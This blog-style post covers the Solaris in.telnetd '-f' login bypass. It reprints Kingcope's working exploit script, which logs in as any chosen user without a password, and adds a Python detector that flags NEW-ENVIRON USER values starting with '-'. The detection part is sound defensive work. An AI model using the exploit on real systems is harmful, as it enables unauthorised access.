Solaris Telnet Vulnerability…Again?
This is a serious oversight in something so trivial. Just check out this publicly released code on packetstorm and how little is needed to become any user on that system!
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
# two arguments are required: the target host, then the user name to log in as
if [ $# -ne 2 ]; then
echo "./sunos"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
# the login name "-f$2" is handed on by in.telnetd to login(1) as its -f option,
# which marks the user as already authenticated
telnet -l"-f$2" $1
The telnet daemon in.telnetd, especially the Solaris/SunOS one, has had quite a number of problems in the past. Here is an old exploit relating to a problem with TTYPROMPT; the systems vulnerable to it are SunOS 5.5, 5.5.1, 5.6, 5.7 and 5.8.
This new vulnerability is very similar to the old one, where an environment variable was the problem. Usually in such cases the variables contain a large number of characters, so when a user logs in using telnet and those variables are read, the buffer overflows; the variables usually also carry shellcode that executes when this happens.
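The script above logs in with a user name that begins with an option flag. A telnet client started with `-l name` sends that name to the server as the USER variable inside a NEW-ENVIRON (RFC 1572) subnegotiation, which is where a network sensor can spot the pattern. The following detector is an added example, not code from the original post or from Kingcope: it parses the NEW-ENVIRON subnegotiations in a captured telnet byte stream and reports any USER value starting with `-`. The sample bytes and the function names are constructed for this example.

```python
"""Flag telnet NEW-ENVIRON USER values that begin with an option flag.

Added detection example; the protocol constants are from RFC 854 and
RFC 1572, the sample traffic at the bottom is constructed.
"""
from __future__ import annotations

# Telnet command bytes (RFC 854) and the NEW-ENVIRON option (RFC 1572)
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3


def iter_subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB ... IAC SE in the stream."""
    i, n = 0, len(stream)
    while i < n:
        if stream[i] == IAC and i + 1 < n and stream[i + 1] == SB:
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end == -1:
                return  # truncated subnegotiation: nothing more to parse
            body = stream[i + 2:end]
            if body:
                # an IAC byte inside a subnegotiation is sent doubled
                yield body[0], body[1:].replace(b"\xff\xff", b"\xff")
            i = end + 2
        else:
            i += 1


def parse_new_environ(payload: bytes) -> list[tuple[str, str]]:
    """Decode an IS/INFO NEW-ENVIRON payload into (name, value) pairs."""
    if not payload or payload[0] not in (ENV_IS, ENV_INFO):
        return []  # a SEND request carries no values
    tokens: list[tuple[int, bytearray]] = []
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR, VALUE):
            tokens.append((b, bytearray()))  # start of a name or a value
        elif tokens:
            if b == ESC and i + 1 < len(payload):
                i += 1  # ESC quotes the next byte literally
                b = payload[i]
            tokens[-1][1].append(b)
        i += 1
    pairs: list[tuple[str, str]] = []
    for idx, (kind, text) in enumerate(tokens):
        if kind in (VAR, USERVAR):
            value = b""
            if idx + 1 < len(tokens) and tokens[idx + 1][0] == VALUE:
                value = bytes(tokens[idx + 1][1])
            pairs.append((bytes(text).decode("latin-1"), value.decode("latin-1")))
    return pairs


def suspicious_users(stream: bytes) -> list[str]:
    """Return every USER value in the stream that starts with '-'."""
    hits: list[str] = []
    for option, payload in iter_subnegotiations(stream):
        if option != NEW_ENVIRON:
            continue
        for name, value in parse_new_environ(payload):
            if name == "USER" and value.startswith("-"):
                hits.append(value)
    return hits


# Constructed sample: a normal login followed by the option-flag shape
SAMPLE = (
    b"\xff\xfb\x27"                                # IAC WILL NEW-ENVIRON
    b"\xff\xfa\x27\x00\x00USER\x01alice\xff\xf0"   # IS VAR "USER" VALUE "alice"
    b"\xff\xfa\x27\x00\x00USER\x01-fbin\xff\xf0"   # IS VAR "USER" VALUE "-fbin"
)

if __name__ == "__main__":
    print(suspicious_users(SAMPLE))  # ['-fbin']
```

The check looks only at the USER variable because that is the one `-l` populates; a sensor that also wants to catch the same shape under a USERVAR name can drop the `name == "USER"` test.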
These days telnet is seldom used for Unix logins; ssh is usually preferred because of its extra security settings and encryption, although telnet is still around on network devices such as routers or switches which don't support ssh.